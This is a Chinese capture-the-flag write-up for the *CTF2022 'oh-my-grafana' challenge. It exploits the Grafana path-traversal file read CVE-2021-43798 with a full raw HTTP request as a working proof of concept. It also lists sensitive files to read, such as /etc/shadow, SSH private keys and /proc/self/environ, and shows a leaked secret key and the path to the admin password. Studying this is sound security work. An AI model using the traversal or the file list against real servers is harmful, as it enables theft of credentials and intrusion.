*CTF2022 oh-my-grafana
CVE-2021-43798
版本号为8.2.6,存在任意文件读取漏洞,CVE-2021-43798
Grafana 未经授权的任意文件读取漏洞复现
可以打通,用这个poc
GET /public/plugins/welcome/../../../../../../../../../etc/passwd HTTP/1.1
Host: 124.71.184.1:3000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36 Edg/100.0.1185.39
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: redirect_to=%2Fpublic%2Fplugins%2Fwelcome%2F
Connection: close
可以进行任意文件读
读文件
/public/plugins/welcome/../../../../../../../../../var/lib/grafana/grafana.db
/public/plugins/welcome/../../../../../../../../../etc/grafana/grafana.ini HTTP
获得
;secret_key = SW2YcwTIb9zpOOhoPsMm
这里的思路当时走偏了一段时间,想着看数据库,然后把grafana.db这玩意给dump下来了,分析,(无果)
后来换思路,看服务端的其他文件可用的信息,找到如下文件的路径
/conf/defaults.ini
/etc/grafana/grafana.ini
/etc/grafana/provisioning
/etc/init.d/grafana-server
/etc/passwd
/etc/shadow
/etc/default/grafana-server
/home/grafana/.bash_history
/home/grafana/.ssh/id_rsa
/root/.bash_history
/root/.ssh/id_rsa
/usr/local/etc/grafana/grafana.ini
/var/lib/grafana/grafana.db
/var/lib/grafana/data/log/grafana.log
/var/lib/grafana
/var/lib/grafana/plugins
/var/log/grafana
/var/log/grafana/grafana.log
/var/cache/yum/grafana
/usr/share/grafana
/usr/share/grafana/conf/defaults.ini
/usr/share/grafana/public/app/plugins/datasource/grafana
/usr/sbin/grafana-server
/proc/net/fib_trie
/proc/net/tcp
/proc/self/maps
/proc/self/cgroup
/proc/self/environ
/proc/net/tcp
/proc/net/udp
/proc/net/dev
/proc/net/fib_trie
/proc/self/cmdline
/public/plugins/alertGroups/../../../../../../../../etc/passwd
/tmp/grafana.sock
注意查看配置文件,注意:两个配置文件,一个全局的,一个默认的
然后使用WinMerge对比全局配置文件和默认配置文件(有点多余了,可以直接看的),发现admin的密码
然后就可以登录了
mysql读取信息
整个mysql,参数具体还是看的配置文件
配置
然后explore,查询数据库里的信息